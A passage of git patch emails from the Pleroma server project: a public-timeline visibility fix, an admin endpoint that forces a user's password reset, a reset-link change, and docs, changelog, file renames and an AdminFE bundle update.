being filtered out from the public timeline for an authenticated user (`GET
/api/v1/timelines/public`)
---
CHANGELOG.md | 2 ++
lib/pleroma/web/activity_pub/activity_pub.ex | 5 +++--
.../controllers/mastodon_api_controller.ex | 1 -
.../mastodon_api_controller_test.exs | 16 ++++++++++++++++
4 files changed, 21 insertions(+), 3 deletions(-)
diff --git a/CHANGELOG.md b/CHANGELOG.md
index 84b64e2b9..93b7e2a10 100644
--- a/CHANGELOG.md
+++ b/CHANGELOG.md
@@ -12,6 +12,8 @@ The format is based on [Keep a Changelog](https://keepachangelog.com/en/1.0.0/).
- Introduced [quantum](https://github.com/quantum-elixir/quantum-core) job scheduler
- Admin API: Return `total` when querying for reports
- Mastodon API: Return `pleroma.direct_conversation_id` when creating a direct message (`POST /api/v1/statuses`)
+### Fixed
+- Mastodon API: Fix private and direct statuses not being filtered out from the public timeline for an authenticated user (`GET /api/v1/timelines/public`)
## [1.1.0] - 2019-??-??
### Security
diff --git a/lib/pleroma/web/activity_pub/activity_pub.ex b/lib/pleroma/web/activity_pub/activity_pub.ex
index e1e90d667..1cf8b6151 100644
--- a/lib/pleroma/web/activity_pub/activity_pub.ex
+++ b/lib/pleroma/web/activity_pub/activity_pub.ex
@@ -520,9 +520,10 @@ def fetch_latest_activity_id_for_context(context, opts \\ %{}) do
end
def fetch_public_activities(opts \\ %{}) do
- q = fetch_activities_query([Pleroma.Constants.as_public()], opts)
+ opts = Map.drop(opts, ["user"])
- q
+ [Pleroma.Constants.as_public()]
+ |> fetch_activities_query(opts)
|> restrict_unlisted()
|> Pagination.fetch_paginated(opts)
|> Enum.reverse()
diff --git a/lib/pleroma/web/mastodon_api/controllers/mastodon_api_controller.ex b/lib/pleroma/web/mastodon_api/controllers/mastodon_api_controller.ex
index 6704ee7e8..6421c2c53 100644
--- a/lib/pleroma/web/mastodon_api/controllers/mastodon_api_controller.ex
+++ b/lib/pleroma/web/mastodon_api/controllers/mastodon_api_controller.ex
@@ -381,7 +381,6 @@ def public_timeline(%{assigns: %{user: user}} = conn, params) do
|> Map.put("local_only", local_only)
|> Map.put("blocking_user", user)
|> Map.put("muting_user", user)
- |> Map.put("user", user)
|> ActivityPub.fetch_public_activities()
|> Enum.reverse()
diff --git a/test/web/mastodon_api/mastodon_api_controller_test.exs b/test/web/mastodon_api/mastodon_api_controller_test.exs
index 35a0d3fe1..51f5215c2 100644
--- a/test/web/mastodon_api/mastodon_api_controller_test.exs
+++ b/test/web/mastodon_api/mastodon_api_controller_test.exs
@@ -97,6 +97,22 @@ test "the public timeline when public is set to false", %{conn: conn} do
|> json_response(403) == %{"error" => "This resource requires authentication."}
end
+ test "the public timeline includes only public statuses for an authenticated user" do
+ user = insert(:user)
+
+ conn =
+ build_conn()
+ |> assign(:user, user)
+
+ {:ok, _activity} = CommonAPI.post(user, %{"status" => "test"})
+ {:ok, _activity} = CommonAPI.post(user, %{"status" => "test", "visibility" => "private"})
+ {:ok, _activity} = CommonAPI.post(user, %{"status" => "test", "visibility" => "unlisted"})
+ {:ok, _activity} = CommonAPI.post(user, %{"status" => "test", "visibility" => "direct"})
+
+ res_conn = get(conn, "/api/v1/timelines/public")
+ assert length(json_response(res_conn, 200)) == 1
+ end
+
describe "posting statuses" do
setup do
user = insert(:user)
From 6f25668215f7f9fe20bfaf3dd72e2262a6d8915e Mon Sep 17 00:00:00 2001
From: Maxim Filippov
Date: Sun, 22 Sep 2019 16:08:07 +0300
Subject: [PATCH 191/272] Admin API: Add ability to force user's password reset
---
CHANGELOG.md | 2 ++
docs/api/admin_api.md | 8 ++++++
lib/pleroma/user.ex | 17 ++++++++++++
lib/pleroma/user/info.ex | 13 ++++++---
.../web/admin_api/admin_api_controller.ex | 9 +++++++
lib/pleroma/web/oauth/oauth_controller.ex | 5 ++++
lib/pleroma/web/router.ex | 1 +
lib/pleroma/workers/background_worker.ex | 5 ++++
test/user_test.exs | 17 ++++++++++++
.../admin_api/admin_api_controller_test.exs | 26 ++++++++++++++++++
test/web/oauth/oauth_controller_test.exs | 27 +++++++++++++++++++
.../twitter_api/password_controller_test.exs | 21 +++++++++++++++
12 files changed, 148 insertions(+), 3 deletions(-)
diff --git a/CHANGELOG.md b/CHANGELOG.md
index 84b64e2b9..e5a84f5ae 100644
--- a/CHANGELOG.md
+++ b/CHANGELOG.md
@@ -6,6 +6,8 @@ The format is based on [Keep a Changelog](https://keepachangelog.com/en/1.0.0/).
## [Unreleased]
### Added
- Refreshing poll results for remote polls
+- Admin API: Add ability to force user's password reset
+
### Changed
- **Breaking:** Elixir >=1.8 is now required (was >= 1.7)
- Replaced [pleroma_job_queue](https://git.pleroma.social/pleroma/pleroma_job_queue) and `Pleroma.Web.Federator.RetryQueue` with [Oban](https://github.com/sorentwo/oban) (see [`docs/config.md`](docs/config.md) on migrating customized worker / retry settings)
diff --git a/docs/api/admin_api.md b/docs/api/admin_api.md
index 7637fa0d4..c6b9dd2b6 100644
--- a/docs/api/admin_api.md
+++ b/docs/api/admin_api.md
@@ -310,6 +310,14 @@ Note: Available `:permission_group` is currently moderator and admin. 404 is ret
- Params: none
- Response: password reset token (base64 string)
+## `/api/pleroma/admin/users/:nickname/force_password_reset`
+
+### Force passord reset for a user with a given nickname
+
+- Methods: `PATCH`
+- Params: none
+- Response: none (code `204`)
+
## `/api/pleroma/admin/reports`
### Get a list of reports
- Method `GET`
diff --git a/lib/pleroma/user.ex b/lib/pleroma/user.ex
index fb1f24254..ab253a274 100644
--- a/lib/pleroma/user.ex
+++ b/lib/pleroma/user.ex
@@ -269,6 +269,7 @@ def password_update_changeset(struct, params) do
|> validate_required([:password, :password_confirmation])
|> validate_confirmation(:password)
|> put_password_hash
+ |> put_embed(:info, User.Info.set_password_reset_pending(struct.info, false))
end
@spec reset_password(User.t(), map) :: {:ok, User.t()} | {:error, Ecto.Changeset.t()}
@@ -285,6 +286,20 @@ def reset_password(%User{id: user_id} = user, data) do
end
end
+ def force_password_reset_async(user) do
+ BackgroundWorker.enqueue("force_password_reset", %{"user_id" => user.id})
+ end
+
+ @spec force_password_reset(User.t()) :: {:ok, User.t()} | {:error, Ecto.Changeset.t()}
+ def force_password_reset(user) do
+ info_cng = User.Info.set_password_reset_pending(user.info, true)
+
+ user
+ |> change()
+ |> put_embed(:info, info_cng)
+ |> update_and_set_cache()
+ end
+
def register_changeset(struct, params \\ %{}, opts \\ []) do
bio_limit = Pleroma.Config.get([:instance, :user_bio_length], 5000)
name_limit = Pleroma.Config.get([:instance, :user_name_length], 100)
@@ -1115,6 +1130,8 @@ def delete(%User{} = user) do
BackgroundWorker.enqueue("delete_user", %{"user_id" => user.id})
end
+ def perform(:force_password_reset, user), do: force_password_reset(user)
+
@spec perform(atom(), User.t()) :: {:ok, User.t()}
def perform(:delete, %User{} = user) do
{:ok, _user} = ActivityPub.delete(user)
diff --git a/lib/pleroma/user/info.ex b/lib/pleroma/user/info.ex
index b150a57cd..67abc3ecd 100644
--- a/lib/pleroma/user/info.ex
+++ b/lib/pleroma/user/info.ex
@@ -20,6 +20,7 @@ defmodule Pleroma.User.Info do
field(:following_count, :integer, default: nil)
field(:locked, :boolean, default: false)
field(:confirmation_pending, :boolean, default: false)
+ field(:password_reset_pending, :boolean, default: false)
field(:confirmation_token, :string, default: nil)
field(:default_scope, :string, default: "public")
field(:blocks, {:array, :string}, default: [])
@@ -82,6 +83,14 @@ def set_activation_status(info, deactivated) do
|> validate_required([:deactivated])
end
+ def set_password_reset_pending(info, pending) do
+ params = %{password_reset_pending: pending}
+
+ info
+ |> cast(params, [:password_reset_pending])
+ |> validate_required([:password_reset_pending])
+ end
+
def update_notification_settings(info, settings) do
settings =
settings
@@ -333,9 +342,7 @@ defp valid_field?(%{"name" => name, "value" => value}) do
name_limit = Pleroma.Config.get([:instance, :account_field_name_length], 255)
value_limit = Pleroma.Config.get([:instance, :account_field_value_length], 255)
- is_binary(name) &&
- is_binary(value) &&
- String.length(name) <= name_limit &&
+ is_binary(name) && is_binary(value) && String.length(name) <= name_limit &&
String.length(value) <= value_limit
end
diff --git a/lib/pleroma/web/admin_api/admin_api_controller.ex b/lib/pleroma/web/admin_api/admin_api_controller.ex
index 8a8091daa..711e4dfc2 100644
--- a/lib/pleroma/web/admin_api/admin_api_controller.ex
+++ b/lib/pleroma/web/admin_api/admin_api_controller.ex
@@ -447,6 +447,15 @@ def get_password_reset(conn, %{"nickname" => nickname}) do
|> json(token.token)
end
+ @doc "Force password reset for a given user"
+ def force_password_reset(conn, %{"nickname" => nickname}) do
+ (%User{local: true} = user) = User.get_cached_by_nickname(nickname)
+
+ User.force_password_reset_async(user)
+
+ json_response(conn, :no_content, "")
+ end
+
def list_reports(conn, params) do
params =
params
diff --git a/lib/pleroma/web/oauth/oauth_controller.ex b/lib/pleroma/web/oauth/oauth_controller.ex
index 81eae2c8b..a57670e02 100644
--- a/lib/pleroma/web/oauth/oauth_controller.ex
+++ b/lib/pleroma/web/oauth/oauth_controller.ex
@@ -202,6 +202,8 @@ def token_exchange(
{:ok, app} <- Token.Utils.fetch_app(conn),
{:auth_active, true} <- {:auth_active, User.auth_active?(user)},
{:user_active, true} <- {:user_active, !user.info.deactivated},
+ {:password_reset_pending, false} <-
+ {:password_reset_pending, user.info.password_reset_pending},
{:ok, scopes} <- validate_scopes(app, params),
{:ok, auth} <- Authorization.create_authorization(app, user, scopes),
{:ok, token} <- Token.exchange_token(app, auth) do
@@ -215,6 +217,9 @@ def token_exchange(
{:user_active, false} ->
render_error(conn, :forbidden, "Your account is currently disabled")
+ {:password_reset_pending, true} ->
+ render_error(conn, :forbidden, "Password reset is required")
+
_error ->
render_invalid_credentials_error(conn)
end
diff --git a/lib/pleroma/web/router.ex b/lib/pleroma/web/router.ex
index b9b85fd67..a306c1b80 100644
--- a/lib/pleroma/web/router.ex
+++ b/lib/pleroma/web/router.ex
@@ -186,6 +186,7 @@ defmodule Pleroma.Web.Router do
post("/users/email_invite", AdminAPIController, :email_invite)
get("/users/:nickname/password_reset", AdminAPIController, :get_password_reset)
+ patch("/users/:nickname/force_password_reset", AdminAPIController, :force_password_reset)
get("/users", AdminAPIController, :list_users)
get("/users/:nickname", AdminAPIController, :user_show)
diff --git a/lib/pleroma/workers/background_worker.ex b/lib/pleroma/workers/background_worker.ex
index 082f20ab7..7ffc8eabe 100644
--- a/lib/pleroma/workers/background_worker.ex
+++ b/lib/pleroma/workers/background_worker.ex
@@ -26,6 +26,11 @@ def perform(%{"op" => "delete_user", "user_id" => user_id}, _job) do
User.perform(:delete, user)
end
+ def perform(%{"op" => "force_password_reset", "user_id" => user_id}, _job) do
+ user = User.get_cached_by_id(user_id)
+ User.perform(:force_password_reset, user)
+ end
+
def perform(
%{
"op" => "blocks_import",
diff --git a/test/user_test.exs b/test/user_test.exs
index 39ba69668..164172405 100644
--- a/test/user_test.exs
+++ b/test/user_test.exs
@@ -1690,4 +1690,21 @@ test "changes email", %{user: user} do
assert {:ok, %User{email: "cofe@cofe.party"}} = User.change_email(user, "cofe@cofe.party")
end
end
+
+ describe "set_password_reset_pending/2" do
+ setup do
+ [user: insert(:user)]
+ end
+
+ test "sets password_reset_pending to true", %{user: user} do
+ %{password_reset_pending: password_reset_pending} = user.info
+
+ refute password_reset_pending
+
+ {:ok, %{info: %{password_reset_pending: password_reset_pending}}} =
+ User.force_password_reset(user)
+
+ assert password_reset_pending
+ end
+ end
end
diff --git a/test/web/admin_api/admin_api_controller_test.exs b/test/web/admin_api/admin_api_controller_test.exs
index 108143f6a..f00e02a7a 100644
--- a/test/web/admin_api/admin_api_controller_test.exs
+++ b/test/web/admin_api/admin_api_controller_test.exs
@@ -4,11 +4,13 @@
defmodule Pleroma.Web.AdminAPI.AdminAPIControllerTest do
use Pleroma.Web.ConnCase
+ use Oban.Testing, repo: Pleroma.Repo
alias Pleroma.Activity
alias Pleroma.HTML
alias Pleroma.ModerationLog
alias Pleroma.Repo
+ alias Pleroma.Tests.ObanHelpers
alias Pleroma.User
alias Pleroma.UserInviteToken
alias Pleroma.Web.CommonAPI
@@ -2351,6 +2353,30 @@ test "returns the log with pagination", %{conn: conn, admin: admin} do
"@#{admin.nickname} followed relay: https://example.org/relay"
end
end
+
+ describe "PATCH /users/:nickname/force_password_reset" do
+ setup %{conn: conn} do
+ admin = insert(:user, info: %{is_admin: true})
+ user = insert(:user)
+
+ %{conn: assign(conn, :user, admin), admin: admin, user: user}
+ end
+
+ test "sets password_reset_pending to true", %{admin: admin, user: user} do
+ assert user.info.password_reset_pending == false
+
+ conn =
+ build_conn()
+ |> assign(:user, admin)
+ |> patch("/api/pleroma/admin/users/#{user.nickname}/force_password_reset")
+
+ assert json_response(conn, 204) == ""
+
+ ObanHelpers.perform_all()
+
+ assert User.get_by_id(user.id).info.password_reset_pending == true
+ end
+ end
end
# Needed for testing
diff --git a/test/web/oauth/oauth_controller_test.exs b/test/web/oauth/oauth_controller_test.exs
index 2780e1746..8b88fd784 100644
--- a/test/web/oauth/oauth_controller_test.exs
+++ b/test/web/oauth/oauth_controller_test.exs
@@ -831,6 +831,33 @@ test "rejects token exchange for valid credentials belonging to deactivated user
refute Map.has_key?(resp, "access_token")
end
+ test "rejects token exchange for user with password_reset_pending set to true" do
+ password = "testpassword"
+
+ user =
+ insert(:user,
+ password_hash: Comeonin.Pbkdf2.hashpwsalt(password),
+ info: %{password_reset_pending: true}
+ )
+
+ app = insert(:oauth_app, scopes: ["read", "write"])
+
+ conn =
+ build_conn()
+ |> post("/oauth/token", %{
+ "grant_type" => "password",
+ "username" => user.nickname,
+ "password" => password,
+ "client_id" => app.client_id,
+ "client_secret" => app.client_secret
+ })
+
+ assert resp = json_response(conn, 403)
+
+ assert resp["error"] == "Password reset is required"
+ refute Map.has_key?(resp, "access_token")
+ end
+
test "rejects an invalid authorization code" do
app = insert(:oauth_app)
diff --git a/test/web/twitter_api/password_controller_test.exs b/test/web/twitter_api/password_controller_test.exs
index 3a7246ea8..dc6d4e3e3 100644
--- a/test/web/twitter_api/password_controller_test.exs
+++ b/test/web/twitter_api/password_controller_test.exs
@@ -6,6 +6,7 @@ defmodule Pleroma.Web.TwitterAPI.PasswordControllerTest do
use Pleroma.Web.ConnCase
alias Pleroma.PasswordResetToken
+ alias Pleroma.User
alias Pleroma.Web.OAuth.Token
import Pleroma.Factory
@@ -56,5 +57,25 @@ test "it returns HTTP 200", %{conn: conn} do
assert Comeonin.Pbkdf2.checkpw("test", user.password_hash)
assert length(Token.get_user_tokens(user)) == 0
end
+
+ test "it sets password_reset_pending to false", %{conn: conn} do
+ user = insert(:user, info: %{password_reset_pending: true})
+
+ {:ok, token} = PasswordResetToken.create_token(user)
+ {:ok, _access_token} = Token.create_token(insert(:oauth_app), user, %{})
+
+ params = %{
+ "password" => "test",
+ password_confirmation: "test",
+ token: token.token
+ }
+
+ conn
+ |> assign(:user, user)
+ |> post("/api/pleroma/password_reset", %{data: params})
+ |> html_response(:ok)
+
+ assert User.get_by_id(user.id).info.password_reset_pending == false
+ end
end
end
From 72a01f1350239d286978007883a087f8f3985d1b Mon Sep 17 00:00:00 2001
From: Maxim Filippov
Date: Sun, 22 Sep 2019 16:36:59 +0300
Subject: [PATCH 192/272] Use router helper to generate reset password link
---
lib/pleroma/web/admin_api/admin_api_controller.ex | 6 +++---
test/web/admin_api/admin_api_controller_test.exs | 4 +++-
2 files changed, 6 insertions(+), 4 deletions(-)
diff --git a/lib/pleroma/web/admin_api/admin_api_controller.ex b/lib/pleroma/web/admin_api/admin_api_controller.ex
index 54ab6e032..b2df1e5b8 100644
--- a/lib/pleroma/web/admin_api/admin_api_controller.ex
+++ b/lib/pleroma/web/admin_api/admin_api_controller.ex
@@ -17,7 +17,9 @@ defmodule Pleroma.Web.AdminAPI.AdminAPIController do
alias Pleroma.Web.AdminAPI.ReportView
alias Pleroma.Web.AdminAPI.Search
alias Pleroma.Web.CommonAPI
+ alias Pleroma.Web.Endpoint
alias Pleroma.Web.MastodonAPI.StatusView
+ alias Pleroma.Web.Router
import Pleroma.Web.ControllerHelper, only: [json_response: 3]
@@ -432,13 +434,11 @@ def revoke_invite(conn, %{"token" => token}) do
def get_password_reset(conn, %{"nickname" => nickname}) do
(%User{local: true} = user) = User.get_cached_by_nickname(nickname)
{:ok, token} = Pleroma.PasswordResetToken.create_token(user)
- host = Pleroma.Config.get([Pleroma.Web.Endpoint, :url, :host])
- protocol = Pleroma.Config.get([Pleroma.Web.Endpoint, :protocol])
conn
|> json(%{
token: token.token,
- link: "#{protocol}://#{host}/api/pleroma/password_reset/#{token.token}"
+ link: Router.Helpers.reset_password_url(Endpoint, :reset, token.token)
})
end
diff --git a/test/web/admin_api/admin_api_controller_test.exs b/test/web/admin_api/admin_api_controller_test.exs
index c497ea098..77c67011d 100644
--- a/test/web/admin_api/admin_api_controller_test.exs
+++ b/test/web/admin_api/admin_api_controller_test.exs
@@ -596,7 +596,9 @@ test "/api/pleroma/admin/users/:nickname/password_reset" do
|> put_req_header("accept", "application/json")
|> get("/api/pleroma/admin/users/#{user.nickname}/password_reset")
- assert conn.status == 200
+ resp = json_response(conn, 200)
+
+ assert Regex.match?(~r/(http:\/\/|https:\/\/)/, resp["link"])
end
describe "GET /api/pleroma/admin/users" do
From f89fe3ac06505cc07372fcdefdc3fde72d1f04a0 Mon Sep 17 00:00:00 2001
From: Maxim Filippov
Date: Sun, 22 Sep 2019 16:45:38 +0300
Subject: [PATCH 193/272] Update docs
---
docs/api/admin_api.md | 10 +++++++++-
1 file changed, 9 insertions(+), 1 deletion(-)
diff --git a/docs/api/admin_api.md b/docs/api/admin_api.md
index 9362e3d78..8bc6379aa 100644
--- a/docs/api/admin_api.md
+++ b/docs/api/admin_api.md
@@ -298,7 +298,15 @@ Note: Available `:permission_group` is currently moderator and admin. 404 is ret
- Methods: `GET`
- Params: none
-- Response: password reset token (base64 string)
+- Response:
+
+```json
+{
+ "token": "U13DX6muOvpRsj35_ij9wLxUbkU-eFvfKttxs6gIajo=", // password reset token (base64 string)
+ "link": "https://pleroma.social/api/pleroma/password_reset/U13DX6muOvpRsj35_ij9wLxUbkU-eFvfKttxs6gIajo%3D"
+}
+```
+
## `/api/pleroma/admin/reports`
### Get a list of reports
From c8fdf757c124ac053307b0b4e02a38fc40e2dc58 Mon Sep 17 00:00:00 2001
From: Maxim Filippov
Date: Sun, 22 Sep 2019 16:59:37 +0300
Subject: [PATCH 194/272] I did not put these lines in CHANGELOG
---
CHANGELOG.md | 2 --
1 file changed, 2 deletions(-)
diff --git a/CHANGELOG.md b/CHANGELOG.md
index b9a05dadb..6c31c0075 100644
--- a/CHANGELOG.md
+++ b/CHANGELOG.md
@@ -8,8 +8,6 @@ The format is based on [Keep a Changelog](https://keepachangelog.com/en/1.0.0/).
- Refreshing poll results for remote polls
### Changed
- **Breaking:** Elixir >=1.8 is now required (was >= 1.7)
-- Replaced [pleroma_job_queue](https://git.pleroma.social/pleroma/pleroma_job_queue) and `Pleroma.Web.Federator.RetryQueue` with [Oban](https://github.com/sorentwo/oban) (see [`docs/config.md`](docs/config.md) on migrating customized worker / retry settings)
-- Introduced [quantum](https://github.com/quantum-elixir/quantum-core) job scheduler
- Admin API: Return `total` when querying for reports
- Mastodon API: Return `pleroma.direct_conversation_id` when creating a direct message (`POST /api/v1/statuses`)
From 79c3443b609663ab23a4353ebdb7e5e2f0e6a150 Mon Sep 17 00:00:00 2001
From: Maxim Filippov
Date: Sun, 22 Sep 2019 17:00:49 +0300
Subject: [PATCH 195/272] Update CHANGELOG
---
CHANGELOG.md | 6 +++---
1 file changed, 3 insertions(+), 3 deletions(-)
diff --git a/CHANGELOG.md b/CHANGELOG.md
index 6c31c0075..e816e1394 100644
--- a/CHANGELOG.md
+++ b/CHANGELOG.md
@@ -8,8 +8,11 @@ The format is based on [Keep a Changelog](https://keepachangelog.com/en/1.0.0/).
- Refreshing poll results for remote polls
### Changed
- **Breaking:** Elixir >=1.8 is now required (was >= 1.7)
+- Replaced [pleroma_job_queue](https://git.pleroma.social/pleroma/pleroma_job_queue) and `Pleroma.Web.Federator.RetryQueue` with [Oban](https://github.com/sorentwo/oban) (see [`docs/config.md`](docs/config.md) on migrating customized worker / retry settings)
+- Introduced [quantum](https://github.com/quantum-elixir/quantum-core) job scheduler
- Admin API: Return `total` when querying for reports
- Mastodon API: Return `pleroma.direct_conversation_id` when creating a direct message (`POST /api/v1/statuses`)
+- Admin API: Return link alongside with token on password reset
## [1.1.0] - 2019-??-??
### Security
@@ -37,9 +40,6 @@ The format is based on [Keep a Changelog](https://keepachangelog.com/en/1.0.0/).
- AdminAPI: Add "godmode" while fetching user statuses (i.e. admin can see private statuses)
- Improve digest email template
– Pagination: (optional) return `total` alongside with `items` when paginating
-- Replaced [pleroma_job_queue](https://git.pleroma.social/pleroma/pleroma_job_queue) and `Pleroma.Web.Federator.RetryQueue` with [Oban](https://github.com/sorentwo/oban) (see [`docs/config.md`](docs/config.md) on migrating customized worker / retry settings)
-- Introduced [quantum](https://github.com/quantum-elixir/quantum-core) job scheduler
-- Admin API: Return link alongside with token on password reset
### Fixed
- Following from Osada
From d72d4757a8e66c29d58e0a3b7fb36356ae419a54 Mon Sep 17 00:00:00 2001
From: Maxim Filippov
Date: Sun, 22 Sep 2019 23:13:48 +0300
Subject: [PATCH 196/272] Format
---
lib/pleroma/user/info.ex | 4 +++-
1 file changed, 3 insertions(+), 1 deletion(-)
diff --git a/lib/pleroma/user/info.ex b/lib/pleroma/user/info.ex
index 67abc3ecd..99745f496 100644
--- a/lib/pleroma/user/info.ex
+++ b/lib/pleroma/user/info.ex
@@ -342,7 +342,9 @@ defp valid_field?(%{"name" => name, "value" => value}) do
name_limit = Pleroma.Config.get([:instance, :account_field_name_length], 255)
value_limit = Pleroma.Config.get([:instance, :account_field_value_length], 255)
- is_binary(name) && is_binary(value) && String.length(name) <= name_limit &&
+ is_binary(name) &&
+ is_binary(value) &&
+ String.length(name) <= name_limit &&
String.length(value) <= value_limit
end
From cf1960d5961a3a01a6d92c44ab4a6d0ce9570a09 Mon Sep 17 00:00:00 2001
From: Maxim Filippov
Date: Sun, 22 Sep 2019 23:14:18 +0300
Subject: [PATCH 197/272] Better changelog wording
---
CHANGELOG.md | 2 +-
1 file changed, 1 insertion(+), 1 deletion(-)
diff --git a/CHANGELOG.md b/CHANGELOG.md
index e5a84f5ae..f28299666 100644
--- a/CHANGELOG.md
+++ b/CHANGELOG.md
@@ -6,7 +6,7 @@ The format is based on [Keep a Changelog](https://keepachangelog.com/en/1.0.0/).
## [Unreleased]
### Added
- Refreshing poll results for remote polls
-- Admin API: Add ability to force user's password reset
+- Admin API: Add ability to require password reset
### Changed
- **Breaking:** Elixir >=1.8 is now required (was >= 1.7)
From 6b3d5ed6db6a3c73eb1f8373ebd670427aa8849d Mon Sep 17 00:00:00 2001
From: rinpatch
Date: Mon, 23 Sep 2019 21:14:51 +0300
Subject: [PATCH 198/272] Emoji API Controller: Follow phoenix directory
structure
---
.../web/pleroma_api/{ => controllers}/emoji_api_controller.ex | 0
.../web/pleroma_api/{ => controllers}/pleroma_api_controller.ex | 0
test/web/{ => pleroma_api}/emoji_api_controller_test.exs | 0
3 files changed, 0 insertions(+), 0 deletions(-)
rename lib/pleroma/web/pleroma_api/{ => controllers}/emoji_api_controller.ex (100%)
rename lib/pleroma/web/pleroma_api/{ => controllers}/pleroma_api_controller.ex (100%)
rename test/web/{ => pleroma_api}/emoji_api_controller_test.exs (100%)
diff --git a/lib/pleroma/web/pleroma_api/emoji_api_controller.ex b/lib/pleroma/web/pleroma_api/controllers/emoji_api_controller.ex
similarity index 100%
rename from lib/pleroma/web/pleroma_api/emoji_api_controller.ex
rename to lib/pleroma/web/pleroma_api/controllers/emoji_api_controller.ex
diff --git a/lib/pleroma/web/pleroma_api/pleroma_api_controller.ex b/lib/pleroma/web/pleroma_api/controllers/pleroma_api_controller.ex
similarity index 100%
rename from lib/pleroma/web/pleroma_api/pleroma_api_controller.ex
rename to lib/pleroma/web/pleroma_api/controllers/pleroma_api_controller.ex
diff --git a/test/web/emoji_api_controller_test.exs b/test/web/pleroma_api/emoji_api_controller_test.exs
similarity index 100%
rename from test/web/emoji_api_controller_test.exs
rename to test/web/pleroma_api/emoji_api_controller_test.exs
From 646bf0160893f01fe14d1d38f24420ac6c962804 Mon Sep 17 00:00:00 2001
From: "Haelwenn (lanodan) Monnier"
Date: Mon, 23 Sep 2019 21:13:39 +0200
Subject: [PATCH 199/272] Update AdminFE bundle
---
.../{app.34fc670f.css => app.40438ff5.css} | Bin 12809 -> 12809 bytes
priv/static/adminfe/chunk-06db.75709645.css | Bin 0 -> 2044 bytes
priv/static/adminfe/chunk-15fa.bcc01554.css | Bin 0 -> 4748 bytes
priv/static/adminfe/chunk-1a7d.38eb00cf.css | Bin 0 -> 480 bytes
...1.6aaab273.css => chunk-1f27.c0efd1fc.css} | Bin
priv/static/adminfe/chunk-2325.0d22684d.css | Bin 4748 -> 0 bytes
...8.e12401fb.css => chunk-3d1c.2880a519.css} | Bin
priv/static/adminfe/chunk-5913.33f0e7ff.css | Bin 0 -> 3252 bytes
...f.d7a1893c.css => chunk-598f.dc5869e7.css} | Bin
...7.ac97b15a.css => chunk-6292.d1c82a11.css} | Bin
priv/static/adminfe/chunk-7c6b.4a8663a9.css | Bin 0 -> 1737 bytes
priv/static/adminfe/chunk-8b70.9ba0945c.css | Bin 1865 -> 0 bytes
priv/static/adminfe/chunk-e547.e4b6230b.css | Bin 3304 -> 0 bytes
...d8da6.css => chunk-elementUI.f35d8ab1.css} | Bin
...s.4e8c4664.css => chunk-libs.00388c73.css} | Bin
priv/static/adminfe/index.html | 2 +-
.../static/adminfe/static/js/7zzA.e1ae1c94.js | Bin 374 -> 416 bytes
.../adminfe/static/js/7zzA.e1ae1c94.js.map | Bin 0 -> 1913 bytes
.../static/adminfe/static/js/JEtC.f9ba4594.js | Bin 388 -> 430 bytes
.../adminfe/static/js/JEtC.f9ba4594.js.map | Bin 0 -> 1903 bytes
priv/static/adminfe/static/js/app.8e186193.js | Bin 137815 -> 0 bytes
priv/static/adminfe/static/js/app.90c455c5.js | Bin 0 -> 161629 bytes
.../adminfe/static/js/app.90c455c5.js.map | Bin 0 -> 354948 bytes
.../adminfe/static/js/chunk-02a0.db6ec114.js | Bin 266229 -> 0 bytes
.../adminfe/static/js/chunk-0620.c765c190.js | Bin 12982 -> 13030 bytes
.../static/js/chunk-0620.c765c190.js.map | Bin 0 -> 63567 bytes
.../adminfe/static/js/chunk-06db.12facc20.js | Bin 0 -> 5112 bytes
.../static/js/chunk-06db.12facc20.js.map | Bin 0 -> 19586 bytes
.../adminfe/static/js/chunk-15fa.b0633695.js | Bin 0 -> 7919 bytes
.../static/js/chunk-15fa.b0633695.js.map | Bin 0 -> 17438 bytes
.../adminfe/static/js/chunk-16d0.6ce78978.js | Bin 0 -> 1576 bytes
.../static/js/chunk-16d0.6ce78978.js.map | Bin 0 -> 4426 bytes
.../adminfe/static/js/chunk-1a7d.8173d81f.js | Bin 0 -> 16157 bytes
.../static/js/chunk-1a7d.8173d81f.js.map | Bin 0 -> 57112 bytes
...8e1.7f9c377c.js => chunk-1f27.d3c35fbc.js} | Bin 2032 -> 2080 bytes
.../static/js/chunk-1f27.d3c35fbc.js.map | Bin 0 -> 9090 bytes
.../adminfe/static/js/chunk-2325.154a537b.js | Bin 8220 -> 0 bytes
...e18.208cd826.js => chunk-3d1c.20303ef7.js} | Bin 4774 -> 4822 bytes
.../static/js/chunk-3d1c.20303ef7.js.map | Bin 0 -> 18519 bytes
.../adminfe/static/js/chunk-5913.1d21a547.js | Bin 0 -> 27091 bytes
.../static/js/chunk-5913.1d21a547.js.map | Bin 0 -> 88770 bytes
...fbf.616fb309.js => chunk-598f.dd8089ce.js} | Bin 17717 -> 17765 bytes
.../static/js/chunk-598f.dd8089ce.js.map | Bin 0 -> 66937 bytes
.../adminfe/static/js/chunk-5e57.7313703a.js | Bin 217441 -> 0 bytes
.../adminfe/static/js/chunk-6292.0e668979.js | Bin 0 -> 231394 bytes
.../static/js/chunk-6292.0e668979.js.map | Bin 0 -> 689117 bytes
.../adminfe/static/js/chunk-7c6b.c306c730.js | Bin 0 -> 7947 bytes
.../static/js/chunk-7c6b.c306c730.js.map | Bin 0 -> 26432 bytes
.../adminfe/static/js/chunk-7fe2.458f9da5.js | Bin 408401 -> 408449 bytes
.../static/js/chunk-7fe2.458f9da5.js.map | Bin 0 -> 1242154 bytes
.../adminfe/static/js/chunk-8b70.46525646.js | Bin 3190 -> 0 bytes
.../adminfe/static/js/chunk-df62.6c5105a6.js | Bin 0 -> 265970 bytes
.../static/js/chunk-df62.6c5105a6.js.map | Bin 0 -> 796489 bytes
.../adminfe/static/js/chunk-e547.d57d1b91.js | Bin 23125 -> 0 bytes
...911151b.js => chunk-elementUI.708d6b68.js} | Bin 638883 -> 638936 bytes
.../static/js/chunk-elementUI.708d6b68.js.map | Bin 0 -> 2312798 bytes
.../adminfe/static/js/chunk-libs.14514767.js | Bin 0 -> 275816 bytes
.../static/js/chunk-libs.14514767.js.map | Bin 0 -> 1641569 bytes
.../adminfe/static/js/chunk-libs.fb0b7f4a.js | Bin 204635 -> 0 bytes
.../static/adminfe/static/js/oAJy.840fb1c2.js | Bin 0 -> 28900 bytes
.../adminfe/static/js/oAJy.840fb1c2.js.map | Bin 0 -> 135594 bytes
.../adminfe/static/js/runtime.e85850af.js | Bin 0 -> 3859 bytes
.../adminfe/static/js/runtime.e85850af.js.map | Bin 0 -> 16537 bytes
.../adminfe/static/js/runtime.f40c8ec4.js | Bin 3608 -> 0 bytes
64 files changed, 1 insertion(+), 1 deletion(-)
